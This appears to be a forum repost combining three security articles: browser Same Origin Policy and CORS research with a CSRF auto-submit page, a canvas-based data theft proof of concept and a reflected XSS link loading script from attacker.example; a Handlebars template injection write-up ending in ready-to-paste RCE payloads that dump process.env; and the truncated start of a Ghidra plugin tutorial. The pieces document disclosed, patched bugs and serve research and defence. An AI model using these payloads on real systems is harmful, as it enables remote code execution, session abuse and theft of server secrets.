Cookie: PHPSESSID={Bob's secret session cookie}

fromAcc=primary&toAcc=123456&amount=10000

Figure 1: An HTTP request vulnerable to CSRF

So she sets up a page at https://evil-eve.example/how-to-delete-yourself-from-the-internet with the following contents:

<!DOCTYPE html>
<html>
<head>
<script>
document.addEventListener("DOMContentLoaded", function() {
  document.getElementById("gimmeTheMoney").submit();
});
</script>
</head>
<body>
<form id="gimmeTheMoney" method="POST" action="https://bank.example/transfer.php">
  <input type="hidden" name="fromAcc" value="primary">
  <input type="hidden" name="toAcc" value="123456">
  <input type="hidden" name="amount" value="10000">
</form>
</body>
</html>

Figure 2: An HTML page which submits the request in Figure 1

The HTML form on the page corresponds to the POST request shown above. When Bob visits Eve's page, in the hope of erasing past mistakes, the form is automatically submitted and includes Bob's PHPSESSID cookie (if he has logged in to the bank's website recently), performing the money transfer.

… and the defence

There are a few ways websites can protect their users from this type of attack. This article is not meant to explain all of them in detail; OWASP's cheatsheet does a good job at that, albeit on a technical level. In short, there are two main techniques websites can use to counter CSRF:

1. Relying on the browser...
   1.1. ...and its Same Origin Policy (SOP); this is the scenario I investigate in this article
   1.2. ...by setting cookies with the SameSite flag
2. Using dynamic pages and generating one-time tokens for each action on the page, every time the page is reloaded.
Option 1.1 only works if the application refuses to accept requests that are sent via HTML forms (i.e. requests with content type application/x-www-form-urlencoded, multipart/form-data or text/plain, and no non-standard HTTP headers). This is because the same origin policy only applies to actions taken by JavaScript (and other browser-scripting languages). It does not apply to old-school HTML forms, so browsers can't do anything to block HTML form submissions from untrusted domains. Requests containing JSON data or non-standard headers (e.g. X-Requested-With), on the other hand, can only be sent via JavaScript. The browser needs to send a so-called "pre-flight check", and unless the check determines that the target domain (e.g. bank.example) explicitly allows such requests from the origin domain (e.g. evil-eve.example), the browser doesn't send the actual request. bank.example needs to respond with appropriate HTTP headers for the same origin policy to be effective; see the section CORS headers.

Option 1.2 will prevent attacks like the one described, but it is supported only in modern browsers. Furthermore, it will not prevent unauthenticated CSRF attacks against websites which are on an internal network or rely on IP whitelisting for authorization. The method relies on the legitimate server (bank.example) instructing the browser to only include the session cookie if the request is coming from the same origin, i.e. https://bank.example. The browser respects this during HTML form submissions too. This way, money transfers on bank.example work correctly, but the form hosted on evil-eve.example will not include Bob's session cookie when submitted, and hence will prevent the transfer from occurring.

Option 2 can be used to prevent CSRF attacks that rely on any HTTP method and submission type (GET or POST; HTML forms or JavaScript), but has many pitfalls: care needs to be taken to issue, require and validate the token for every request; the server still needs to implement an appropriate CORS policy to prevent malicious sites from learning the token; and the token needs to be generated in a cryptographically secure random way, be long enough, be short-lived, and be tied to the current user's session (i.e. invalidated upon log out).

What is CORS, SOP, preflight checks and all this jibberish you're talking about?

An origin is defined by a schema (or protocol), hostname and port number, e.g. https://bank.example:443. The standard says two origins are considered the same if and only if all of the below conditions are met:

- the protocol for both origins is the same, e.g. https
- the hostname for both origins is the same, e.g. bank.example; the hostname can be only partially-qualified (e.g. localhost); it can also be an IP address [1]
- the port number for both origins is the same; the port number does not have to be explicitly given, i.e. https://bank.example:443 and https://bank.example are the same origin, since 443 is the default port number for https

Requests sent from one origin to a different one are called cross-origin requests. Historically, browsers flat out refused to allow JavaScript to make cross-origin requests. This was done for security reasons, namely to prevent CSRF. As web applications became more complicated and interconnected, the need for JavaScript-initiated cross-origin requests became evident. To enable cross-origin requests in a secure manner, the standard for Cross-Origin Resource Sharing (CORS) was introduced. CORS says that when making cross-origin requests, browsers must include the Origin header and must not include cookies unless explicitly requested, for example if the request had set XMLHttpRequest.withCredentials to true. Additionally, CORS defines the concept of a simple request.
A request is simple if all of these are true:

- the method is GET, HEAD or POST
- the request does not include non-standard headers
- it submits content of type application/x-www-form-urlencoded, multipart/form-data or text/plain (those that can be submitted via HTML forms)

If the request is simple, the browser can send the request to the external origin, but if the server's CORS policy does not allow the request, the browser must not allow JavaScript to read the response. If the request is not simple, the browser must do a preflight check (OPTIONS HTTP method) with appropriate CORS headers, and if the server's CORS policy does not explicitly allow the request, the browser must refuse to send the actual request. Servers receiving cross-origin requests must respond with appropriate CORS headers indicating whether the request is allowed; this is done irrespective of whether the request is a preflight check (OPTIONS) or the actual request (e.g. GET).

CORS headers

If no preflight check is done, browsers are only required to send the Origin header. Otherwise, the preflight check should have an empty body, include no cookies, and include the Access-Control-Request-Method header with the method of the request to be made, e.g. GET. Additionally, if non-standard headers are to be included, it must include these as a comma-separated list in the Access-Control-Request-Headers header. Servers should respond to a cross-origin request with the following headers:

- Access-Control-Allow-Origin: either a single allowed origin or a wildcard (*) indicating all origins; servers may change the value depending on the Origin of the request
- Access-Control-Allow-Credentials: indicating if the browser is allowed to send cookies with the request; if omitted, defaults to false; cannot be true if Access-Control-Allow-Origin is *
- Access-Control-Allow-Headers: comma-separated list of allowed headers

A picture table says a thousand words:

Request is simple | Server allows (Origin / Credentials) | Browser must (Do preflight / Give JavaScript access)
Yes | {not as requested} / No    | No / No
Yes | * / No                     | No / Yes, if no cookies needed
Yes | {as requested} / No or Yes | No / Yes
No  | {not as requested} / No    | Yes / No
No  | * / No                     | Yes / Yes, if no cookies needed
No  | {as requested} / No or Yes | Yes / Yes

Table 1: The CORS standard

Why GET should be "safe"

The preflight checks by browsers and their SOP make sure that requests which may modify sensitive data, such as DELETE, PUT, PATCH and non-simple POST requests, will never be sent to the server from a third-party domain, unless the server explicitly allows such a request from this particular third-party domain. You may then wonder why browsers don't apply the same rules to GET requests. After all, some servers implement, or at least allow, sensitive data operations using GET requests. Take this hypothetical example: a Like button on a social media site (let's call it FakeBook) which is placed under a page and links to https://fakebook.example/like?page=HTTPSEverywhere. When a user clicks on the button in order to like the page, the browser will send a GET request to that URL, and will include the user's session cookie, so that the server knows which user has liked this page. This is a classic CSRF which the browser can't do anything about. Bob, who is logged in to his FakeBook account, goes to windywellington.example to check the weather. windywellington.example is actually a malicious site which wants to collect likes on FakeBook and redirects Bob back to https://fakebook.example/like?page=WindyWellington.
As far as the browser is concerned, there is nothing wrong with that, as there are many legitimate cases which use redirection to third-party domains. And as far as fakebook.example is concerned, Bob may have clicked that Like button himself. Blocking external Referers or using tokens won't work if Like buttons are to be integrated with other sites. So what could SOP do about GET requests? Pretty much nothing. Browsers are not supposed to block redirects by default. And there are many other ways windywellington.example can trick the browser into requesting a resource from fakebook.example, including but not limited to:

- embedding https://fakebook.example/like?page=WindyWellington in an iframe [2]
- loading it as a script, image or any other resource
- using an HTML form with the GET method

In none of those cases can either the browser or fakebook.example detect the malicious intent. This is why the HTTP standard clearly states that GET requests should always be "safe", i.e. never change web application data. And this is also the reason why browsers are not required to submit a preflight check for GET requests. Unfortunately, many websites neglect this and fall victim to CSRF attacks like the hypothetical Like button scenario. (Note: facebook.com is not vulnerable in this way.)

SOP behaviour across browsers

Browsers tested

I tested 17 versions of Opera, 16 versions of Firefox, 40 versions of Chrome, 39 versions of Internet Explorer, and one version of Microsoft Edge: a total of 113 browsers, dating back to 2004. All browsers were tested using their default settings.

Full list of browsers tested and sources used:

- Opera: I tested one version per year, as far back as it supports. Versions can be downloaded from the official Opera archives; versions pre 11.00 can be found on a third-party site. I do not take responsibility for any loss as a result of installing software from unofficial sources. I ran the versions in question on a virtual machine.
- Firefox: I tested roughly one version per year (except version 1.5 from 2005, due to technical issues running the binary), as far back as version 1.0.
- Chrome: I used the ready Windows builds from Chromium's build archives. I did not test stable releases in particular, as the build archives do not indicate which version a build corresponds to; I instead selected one out of roughly every 2000 builds, from the oldest to the newest. The date shown is approximate, as it corresponds to the release date of the corresponding stable major version. I wrote a script which can fetch a list of all builds for a platform or download the portable version of a given build.
- Internet Explorer: I tested every major version as far back as it supports. IE11 on Windows 10 behaves differently to IE11 on older Windows versions, even with the latest patches applied to them. I tested three versions of IE11 on Windows 10, one on Windows 7, and all 31 versions of IE11 on Windows 8.1 (initial release plus updates). Virtual machines for various platforms, including VMware Fusion, with IE versions 8 to 11 can be downloaded from Microsoft, as can virtual machines for Microsoft Hyper-V; these can be imported into VirtualBox as well, and from there exported to OVF format for VMware.
- Microsoft Edge: I tested only one recent version. A virtual machine for various platforms, including VMware Fusion, with the above Edge version can be downloaded from Microsoft.

Test setup

I wrote an HTTP server based on Python's http.server, and some supporting HTML/JavaScript.
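A stripped-down sketch of the idea looks something like this (the real server, linked under Tools used below, does much more, including the dummy login and cookie checks described next; this sketch only shows how the response's CORS headers can be driven by the 'origin' and 'creds' URL parameters):

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class CORSHandler(BaseHTTPRequestHandler):
    def _cors_headers(self):
        params = parse_qs(urlparse(self.path).query)
        origin = params.get("origin", ["*"])[0]
        if origin == "{ECHO}":  # echo back the requesting origin
            origin = self.headers.get("Origin", "*")
        self.send_header("Access-Control-Allow-Origin", origin)
        if params.get("creds", ["0"])[0] == "1":
            self.send_header("Access-Control-Allow-Credentials", "true")

    def do_OPTIONS(self):  # the preflight check
        self.send_response(200)
        self._cors_headers()
        self.end_headers()

    def do_GET(self):
        self.send_response(200)
        self._cors_headers()
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"top secret\n")

HTTPServer(("127.0.0.1", 8000), CORSHandler).serve_forever()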
The server implements a dummy login and requires a cookie issued by it for requests to any file under /secret/. The CORS headers to be included in the server's response to each request are taken from URL parameters in that request. Supported parameters:

- creds: should be 0 or 1, requesting Access-Control-Allow-Credentials: true or false
- origin: specifies Access-Control-Allow-Origin; it is taken literally unless it is {ECHO}, in which case it is taken from the Origin header in the request

/demos/sop/getSecret.html will prompt for the target origin (which should be different to the one it's loaded from), then log in to it, and fetch https://<target_host>/secret/<secret file>?origin=...&creds=..., requesting each one of the five CORS combinations described below; and it will do so using each of the eight cross-origin request methods described below.

Server CORS modes

Each request was submitted 5 times; each time the server was configured to reply with one of the five Access-Control-Allow-* header combinations:

Origin | Credentials
No | No
* | No
* | Yes
{as requested} | No
{as requested} | Yes

Table 2: The combinations of CORS server response headers tested, where "{as requested}" means the server specifically allowed the origin the request came from, "Yes" indicates a true value of the header, and "No" a false one

Cross-origin request methods

Each browser was tested with the following cross-origin request methods (the table lists six; each canvas method was additionally tested both with and without the crossorigin attribute on the image, which is how the count reaches eight):

Method | Body Content-Type or embedded as | Request is simple | Requires cookies? | Response data taken from
GET via XHR | — | Yes | Yes | responseText
POST via XHR | application/json | No | Yes | responseText
GET via iFrame [3] | N/A | Yes | No | contentDocument.body.innerHTML
GET via object [3] | text/plain | Yes | No | contentDocument.body.innerHTML
GET via 2D canvas | N/A | Yes | Yes | toDataURL()
GET via bitmap canvas | N/A | Yes | Yes | toDataURL()

Table 3: The cross-origin request and data exfiltration methods tested (sample code for each method accompanies the original article)

Requested targets

Where the request method used a canvas, the "secret" file was an image; otherwise, the file was a plain text file. Each test was done twice: once to an origin with a different hostname (the IP address of a different interface on the same machine), and once to an origin with the same hostname/IP address but a different port number. This makes for a total of 8 × 5 × 2 = 80 tests per browser.

Results

Below is a summary of those browsers which send the request and/or allow JavaScript to read the response when they shouldn't. For the full list of every request, see the current result tables for cross-origin requests to different hostnames and same hostnames/different ports.

When the target origin differs by hostname

When the target origin had a different hostname, most browsers were either compliant or forbade the request, which is the safe fallback if CORS is not supported. A notable exception is the currently latest versions of Chrome, Firefox and Opera, which allow JavaScript to read so-called "tainted" canvases. These are canvases rendered from an image which has not been loaded for cross-origin use, i.e. no crossorigin attribute was given. I discovered the bug (CVE-2018-18511) while doing this research and reported it to Google and Mozilla. In addition, a few very old versions of Chrome do not apply the CORS policy to XMLHttpRequests. (In this and in any following tables, the highlighted cells indicate behaviour that does not conform to the specification.)
Each entry below lists the browsers, the methods tested, and, for each server configuration (Allow-Origin / Allow-Credentials), what the browser did (Preflight for POST / Give JavaScript access).

Browsers: Chrome 67.0, 69.0, 71.0, 72.0, 74.0; Firefox 65.0; Opera 56.0
Method: GET via bitmap canvas (no CORS)
No/No → access: Yes; */No → access: Yes; {as requested}/No → access: Yes; {as requested}/Yes → access: Yes

Browsers: Chrome 2.0.165.0
Methods: GET via XHR, POST via XHR
No/No → No; */No → Yes / Yes; {as requested}/No → Yes / Yes

Browsers: Chrome 2.0.173.0
Methods: GET via XHR, POST via XHR
No/Yes → No; */No → Yes / Yes; {as requested}/No → Yes / Yes

Table 4: Browsers with dangerous SOP policy for origins differing by hostname

When the target origin differs only by port number

In addition to the vulnerable browsers listed in Table 4, when the target origin differed only in port number, all versions of Internet Explorer and Edge, including the latest ones, had an unsafe SOP policy. Interestingly, Edge allows exporting of tainted bitmap canvases only in this case, when the origins are on the same host.

Browsers: Internet Explorer 11 (<= Windows 8.1), 10, 9, 8; Opera 9.00
Methods: GET via XHR, POST via XHR
No/No → access: Yes; */No → access: Yes; {as requested}/No → access: Yes; {as requested}/Yes → access: Yes

Browsers: Chrome 2.0.165.0
Methods: GET via XHR, POST via XHR
No/No → No; */No → Yes / Yes; {as requested}/No → Yes / Yes

Browsers: Chrome 2.0.173.0
Methods: GET via XHR, POST via XHR
No/Yes → No; */No → Yes / Yes; {as requested}/No → Yes / Yes

Browsers: Microsoft Edge 42; Internet Explorer 11, 10, 9, 8, 7
Method: GET via iFrame
No/No → access: Yes; */No → access: Yes; {as requested}/No → access: Yes; {as requested}/Yes → access: Yes

Browsers: Microsoft Edge 42; Internet Explorer 11, 10, 9
Method: GET via object
No/No → access: Yes; */No → access: Yes; {as requested}/No → access: Yes; {as requested}/Yes → access: Yes

Browsers: Chrome 67.0, 69.0, 71.0, 72.0, 74.0; Firefox 65.0; Opera 56.0; Microsoft Edge 42; Internet Explorer 11, 10, 9; Opera 9.60, 9.20, 9.00
Method: GET via bitmap canvas (no CORS)
No/No → access: Yes; */No → access: Yes; {as requested}/No → access: Yes; {as requested}/Yes → access: Yes

Browsers: Internet Explorer 11, 10, 9; Opera 9.60, 9.20, 9.00
Method: GET via 2D canvas (CORS)
No/No → access: Yes; */No → access: Yes; {as requested}/No → access: Yes; {as requested}/Yes → access: Yes

Table 5: Browsers with dangerous SOP policy for origins differing by port number only
Days after that I discovered an alternative way (CVE-2019-9797) of getting the image: again by converting it to an ImageBitmap, but then rendering it in a 2D canvas instead of a bitmap canvas: <html><body> <script charset="utf-8"> function getData() { createImageBitmap(this, 0, 0, this.naturalWidth, this.naturalHeight).then(function(bmap) { var can = document.createElement('canvas'); // mfsa2019-04 fixed this // -------------------------- // var ctx = can.getContext('bitmaprenderer'); // ctx.transferFromImageBitmap(bmap); // -------------------------- // but not this var ctx = can.getContext('2d'); ctx.drawImage(bmap, 0, 0); document.getElementById('result').textContent = can.toDataURL(); var img = document.getElementById('result_render'); img.src = can.toDataURL(); document.body.appendChild(img); }); } </script> <img style="visibility: hidden" src="https://duckduckgo.com/assets/logo_homepage_mobile.normal.v107.png" onload="getData.call(this)"/> <br/><textarea readonly style="width:100%;height:10em" id="result"></textarea> <br/>Re-rendered image: <br/><img id="result_render"></textarea> </body></html> Mozilla were again quick to fix it. The fix made it into the stable branch on April 1st. Chrome is not vulnerable to this version of the exploit. Issue 2: IE and Edge’s same-origin policy when it comes to origins on the same host It is clear that Internet Explorer and Edge do not consider origins on the same host but different ports distinct, at least not as distinct as origins with different hostnames. This is not a new issue, or an accidental neglect by Microsoft. The Mozilla Developer Guide is quite clear on the fact that: Internet Explorer has two major exceptions to the same-origin policy: Trust Zones: If both domains are in the highly trusted zone (e.g. corporate intranet domains), then the same-origin limitations are not applied. Port: IE doesn’t include port into same-origin checks. Therefore, https://company.com:81/index.html and https://company.com/index.html are considered the same origin and no restrictions are applied. It also clearly points out that: These exceptions are nonstandard and unsupported in any other browser. The behaviour of modern Internet Explorer and Edge is striking for several reasons: The changes introduced for Windows 10 do improve the security of IE, but have been applied inconsistently and insufficiently: They are not available for older Windows versions, even though security updates are still being issued for them. They close the loophole in XMLHttpRequest, but still allow cross-origin access via iframe; data from another origin can also be stolen using object. It clearly violates the standard which has been set long ago, and which all other browsers conform to, and conform to for a good reason. I do not know the reasoning behind their same origin policy, but the implications are not negligible. We often see multiple HTTP services on the same host. Usually one is a standard public site (on ports 80 and 443), another one may be an administrative interface, not accessible publicly. Treating these as a single origin exposes every service on the host to attacks should even one of them be compromised. Consider a hypothetical example: a simple public website, which holds no sensitive data, nor implements authentication. It is likely that not a lot of attention would be paid to its secure implementation as it does not appear to be a valuable target for attackers. 
Let's say a page on the site, /vulnerable.html, is vulnerable to a reflected Cross-Site Scripting (XSS) attack. An attacker can trick the developer of the site into visiting the following link:

http://localhost/vulnerable.html?search=<script%20src%3d"%2f%2fattacker.example%2fevil.js"><%2fscript>

The vulnerable page will reflect the search parameter and in this way load a script from http://attacker.example/evil.js. The JavaScript will execute in the context of the page, localhost, as if it had been hosted on the site. Any requests made by it will come from the origin http://localhost. Imagine there is a sensitive administrative panel on the same host, port 8080, which is not accessible from the public network and does not allow cross-origin requests. If the developer who's fallen victim to the reflected XSS is using Internet Explorer or Edge, then evil.js from attacker.example will have full access to the panel. In particular:

- if the developer is not logged in to the admin panel: it may attempt to brute-force accounts on the administrative panel
- if the developer is logged in to the admin panel: it can get any data from it, or take any action, at the level of privilege of the developer

I leave it to the reader to reach their own conclusion. Mine would be "do not use IE or Edge".

Tools used

- My (not so) simple (anymore) HTTP server, based on Python's simple HTTP server: https://github.com/aayla-secura/mixnmatchttp/tree/master/demos/ and https://pypi.org/project/mixnmatchttp/
- VMware Fusion, for running all of the browsers: https://www.vmware.com/products/fusion.html
- Official Microsoft virtual machines: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

References

- OWASP's CSRF prevention cheatsheet: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
- The Web Origin Concept: https://tools.ietf.org/html/rfc6454
- The Cross-origin resource sharing (CORS) standard: https://www.w3.org/TR/cors/
- The HTTP standard: https://tools.ietf.org/html/rfc7231#section-4.2.1
- Simple HTTP requests: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#Simple_requests

Footnotes

[1] If, however, it is a hostname, the browser doesn't make sure it resolves to the same IP address during different requests; see the DNS Rebinding attack.
[2] Even if fakebook.example prevents this using X-Frame-Options, the GET request is already sent.
[3] iframe and object don't support CORS, so the browser should always refuse access, even if the server would allow a GET for this resource.

Written by Alex Nikolova (@AaylaSecura1138), Security Consultant at Aura Information Security.

Sursa: https://research.aurainfosec.io/same-origin-policy/
-
Handlebars template injection and RCE in a Shopify app
April 04, 2019

TL;DR

We found a zero-day in a JavaScript template library called Handlebars and used it to get Remote Code Execution in the Shopify Return Magic app.

The Story:

In October 2018, Shopify organized the HackerOne event "H1-514", to which some specific researchers were invited, and I was one of them. Some of the Shopify apps that were in scope included an application called "Return Magic" that would automate the whole return process when a customer wants to return a product that they already purchased through a Shopify store. Looking at the application, I found that it has a feature called Email WorkFlow, where shop owners can customize the email message sent to users once they return a product. Users could use variables in their template, such as {{order.number}}, {{email}}, etc.

I decided to test this feature for server-side template injection and entered {{this}} {{self}}, then sent a test email to myself, and the email had [object Object] within it, which immediately attracted my attention. So I spent a lot of time trying to find out what the template engine was. I searched for popular NodeJS template engines and thought the engine was Mustache (wrong). I kept looking for Mustache template injection online, but nothing came up, as Mustache is supposed to be a logicless template engine with no ability to call functions. That made no sense, as I was able to access some object attributes, such as {{this.__proto__}}, and even reach functions such as {{this.constructor.constructor}}, which is the Function constructor. I kept trying to send parameters to this.constructor.constructor() but failed. I decided that this was not vulnerable and moved on to look for more bugs.

Then fate decided that this bug needed to be found, and I saw a message from Shopify on the event Slack channel asking researchers to submit their "almost bugs": if someone found something and feels it's exploitable, they would send the bug to the Shopify security team, and if the team manages to exploit it, the reporter gets paid as if they had found it. Immediately, I sent my submission explaining what I had found, and in the impact section I wrote "Could be a Server Side template injection that can be used to take over the server ¯\_(ツ)_/¯".

Two months passed and I got no response from Shopify regarding my "almost bug" submission. Then I was invited to another hacking event in Bali, hosted by Synack. There I met the Synack Red Team, and after the Synack event had ended, I was supposed to travel back to Egypt, but only 3 hours before the flight I decided to extend my stay for three more days, then fly from Bali to Japan, where I was supposed to participate in the TrendMicro CTF competition with my CTF team. Some of the SRT also decided to extend their stay in Bali. One of them was Matias, so I contacted him to hang out together. After swimming in the ocean and enjoying the beautiful nature of Bali, we went to a restaurant for dinner, where Matias told me about a bug he had found in a bug bounty program that had something to do with JavaScript sandbox escapes. We spent all night messing with objects and constructors, but unfortunately we couldn't escape the sandbox. I couldn't take constructors out of my head, and I remembered the template injection bug I had found in Shopify.
I looked at the HackerOne report and decided the template engine couldn't be Mustache, so I installed Mustache locally, and when I parsed {{this}} with Mustache it actually returned nothing, which is not the case with the Shopify application. I searched again for popular NodeJS template engines and found a bunch of them. I looked for those that used curly brackets {{ }} for template expressions and downloaded them locally. One of the libraries was Handlebars, and when I parsed {{this}} it returned [object Object], which is the same as the Shopify app.

I looked at the Handlebars documentation and found out that it's also supposed to not have much logic, to prevent template injection attacks. But knowing that I could access the Function constructor, I decided to give it a try and see how I could pass parameters to functions. After reading the documentation, I found out that in Handlebars developers can register functions as helpers in the template scope. We can pass parameters to helpers like this: {{helper "param1" "param2" ...params}}. So the first thing I tried was {{this.constructor.constructor "console.log(process.pid)"}}, but it just returned console.log(process.pid) as a string. I went to the source code to find out what was happening. In the runtime.js file, there was the following function:

lambda: function(current, context) {
  return typeof current === 'function' ? current.call(context) : current;
}

So what this function does is check if the current object is of type 'function' and, if so, call it using current.call(context), where context is the template scope; otherwise, it just returns the object itself. I looked further in the documentation of Handlebars and found out that it had built-in helpers such as "with", "blockHelperMissing", "forEach", etc. After reading the source code for each helper, I had an exploitation path in mind using the "with" helper, as it is used to shift the context for a section of a template (by using the built-in with block helper). So I would be able to perform current.call(context) on my own context. So I tried the following:

{{#with "console.log(process.pid)"}}
  {{#this.constructor.constructor}}
    {{#this}}
    {{/this}}
  {{/this.constructor.constructor}}
{{/with}}

Basically, that should pass console.log(process.pid) as the current context; then when the Handlebars compiler reaches this.constructor.constructor and finds that it's a function, it should call it with the current context as the function argument. Then, using {{#with this}}, we call the function returned from the Function constructor, and console.log(process.pid) gets executed. However, this did not work, because Function.prototype.call() invokes a method with an owner object as its first argument; the first argument is the owner object and the remaining arguments are the parameters sent to the function being called. So if the function had been called like current.call(this, context), the previous payload would have worked.

I spent two more nights in Ubud, then flew to Tokyo for the TrendMicro CTF. Again in Tokyo, I couldn't take objects and constructors out of my mind and kept trying to find a way to escape the sandbox. I had another idea of using Array.map() to call the Function constructor on my context, but it didn't work, because the compiler always passes an extra argument to any function I call, namely an object containing the template scope; this causes an error, as my payload is treated as a function argument, not the function body.
{{#with 1 as |int|}}
  {{#blockHelperMissing int as |array|}} // This line will create an array and then we can access its constructor
    {{#with (array.constructor "console.log(process.pid)")}}
      {{this.pop}} // pop unnecessary parameter pushed by the compiler
      {{array.map this.constructor.constructor array}}
    {{/with}}
  {{/blockHelperMissing}}
{{/with}}

There seemed to be many possible ways to escape the sandbox, but I had one big problem facing me: whenever a function is called within the template, the template compiler sends the template scope object as the last parameter. For example, if I try to call something like constructor.constructor("test","test"), the compiler will call it like constructor.constructor("test", "test", this), and since this will be converted to a string by calling Object.toString(), the anonymous function created will be:

function anonymous(test,test){ [object Object] }

which will cause an error. I tried many other things, but still no luck. Then I decided to open the JavaScript documentation for the Object prototype and look for something that could help escape the sandbox. I found out that I could overwrite the Object.prototype.toString() function using Object.defineProperty() so that it calls a function that returns a user-controlled string (my payload). Since I can't define functions using the template, all I have to do is find a function that is already defined within the template scope and returns user-controlled input. For example, the following NodeJS application should be vulnerable:

test.js

var handlebars = require('handlebars'),
    fs = require('fs');

var storeName = "console.log(process.pid)" // this should be a user-controlled string

function getStoreName(){
    return storeName;
}

var scope = {
    getStoreName: getStoreName
}

fs.readFile('example.html', 'utf-8', function(error, source){
    var template = handlebars.compile(source);
    var html = template(scope); // render the template with the scope defined above
    console.log(html)
});

example.html

{{#with this as |test|}} // with is a helper that sets whatever is assigned to it as the context; we name our context test.
  {{#with (test.constructor.getOwnPropertyDescriptor this "getStoreName")}} // get the descriptor of this.getStoreName, where this is the template scope (the scope variable in test.js)
    {{#with (test.constructor.defineProperty test.constructor.prototype "toString" this)}} // overwrite Object.prototype.toString with getStoreName() defined in test.js
      {{#with (test.constructor.constructor "test")}} {{/with}} // call the Function constructor.
    {{/with}}
  {{/with}}
{{/with}}

Now if you run this template, console.log(process.pid) gets executed:

$ node test.js
1337

I reported that to Shopify and mentioned that if there were a function within the scope that returned a user-controlled string, it would have been possible to get RCE. Later, when I met Ibrahim (@the_st0rm), I told him about my idea, and he told me that I could use bind() to create a new function that, when called, will return my RCE payload. From the JavaScript documentation: "The bind() method creates a new function that, when called, has its this keyword set to the provided value, with a given sequence of arguments preceding any provided when the new function is called." So now the idea is to create a string with whichever code I want to execute, then bind its toString() to a function using bind(), and after that overwrite the Object.prototype.toString() function with that function.
I spent a lot of time trying to apply this using handlebars templates, and eventually during my flight back to Egypt I was able to get a fully working PoC with no need to use functions defined in the template scope. {{#with this as |obj|}} {{#with (obj.constructor.keys "1") as |arr|}} {{arr.pop}} {{arr.push obj.constructor.name.constructor.bind}} {{arr.pop}} {{arr.push "console.log(process.env)"}} {{arr.pop}} {{#blockHelperMissing obj.constructor.name.constructor.bind}} {{#with (arr.constructor (obj.constructor.name.constructor.bind.apply obj.constructor.name.constructor arr))}} {{#with (obj.constructor.getOwnPropertyDescriptor this 0)}} {{#with (obj.constructor.defineProperty obj.constructor.prototype "toString" this)}} {{#with (obj.constructor.constructor "test")}} {{/with}} {{/with}} {{/with}} {{/with}} {{/blockHelperMissing}} {{/with}} {{/with}} Basically, what the template above does is: x = '' myToString = x.constructor.bind.apply(x.constructor, [x.constructor.bind,"console.log(process.pid)"]) myToStringArr = Array(myToString) myToStringDescriptor = Object.getOwnPropertyDescriptor(myToStringArr, 0) Object.defineProperty(Object.prototype, "toString", myToStringDescriptor) Object.constructor("test", this)() And when I tried it with Shopify, I got: Matias also texted me with an exploitation that he got which is much simpler than the one I used: {{#with "s" as |string|}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return JSON.stringify(process.env);"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}} With that said, I was able to get RCE on Shopify's Return Magic application as well as some other websites that used handlebars as a template engine. The vulnerability was also submitted to npm security and handlebars pushed a fix that disables access to constructors. The advisory can be found here: https://www.npmjs.com/advisories/755 In a nutshell You can use the following to inject Handlebars templates: {{#with this as |obj|}} {{#with (obj.constructor.keys "1") as |arr|}} {{arr.pop}} {{arr.push obj.constructor.name.constructor.bind}} {{arr.pop}} {{arr.push "return JSON.stringify(process.env);"}} {{arr.pop}} {{#blockHelperMissing obj.constructor.name.constructor.bind}} {{#with (arr.constructor (obj.constructor.name.constructor.bind.apply obj.constructor.name.constructor arr))}} {{#with (obj.constructor.getOwnPropertyDescriptor this 0)}} {{#with (obj.constructor.defineProperty obj.constructor.prototype "toString" this)}} {{#with (obj.constructor.constructor "test")}} {{this}} {{/with}} {{/with}} {{/with}} {{/with}} {{/blockHelperMissing}} {{/with}} {{/with}} Matias also had his own exploitation that is much simpler: {{#with "s" as |string|}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return JSON.stringify(process.env);"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}} Sorry for the long post, if you have any questions please drop me a tweet @Zombiehelp54 Sursa: https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html
-
Ghidra Plugin Development for Vulnerability Research - Part-1

Overview

On March 5th, at the RSA security conference, the National Security Agency (NSA) released a reverse engineering tool called Ghidra. Similar to IDA Pro, Ghidra is a disassembler and decompiler with many powerful features (e.g., plugin support, graph views, cross references, syntax highlighting, etc.). Although Ghidra's plugin capabilities are powerful, there is little information published on their full extent. This blog post series will focus on Ghidra's plugin development and how it can be used to help identify software vulnerabilities.

In our previous post, we leveraged IDA Pro's plugin functionality to identify sinks (potentially vulnerable functions or programming syntax). We then improved upon this technique in our follow-up blog post to identify inline strcpy calls, and identified a buffer overflow in Microsoft Office. In this post, we will use similar techniques with Ghidra's plugin feature to identify sinks in CoreFTPServer v1.2 build 505.

Ghidra Plugin Fundamentals

Before we begin, we recommend going through the example Ghidra plugin scripts and the front page of the API documentation to understand the basics of writing a plugin (Help -> Ghidra API Help). When a Ghidra plugin script runs, the current state of the program will be handled by the following five objects:

- currentProgram: the active program
- currentAddress: the address of the current cursor location in the tool
- currentLocation: the program location of the current cursor location in the tool, or null if no program location exists
- currentSelection: the current selection in the tool, or null if no selection exists
- currentHighlight: the current highlight in the tool, or null if no highlight exists

It is important to note that Ghidra is written in Java, and its plugins can be written in Java or Jython. For the purposes of this post, we will be writing a plugin in Jython. There are three ways to use Ghidra's Jython API:

- Using the Python IDE (similar to the IDA Python console)
- Loading a script from the script manager
- Headless: using Ghidra without a GUI

With an understanding of Ghidra plugin basics, we can now dive deeper into the source code by utilizing the script manager (Right Click on the script -> Edit with Basic Editor). The example plugin scripts are located under /path_to_ghidra/Ghidra/Features/Python/ghidra_scripts. (In the script manager, these are located under Examples/Python/):

Ghidra Plugin Sink Detection

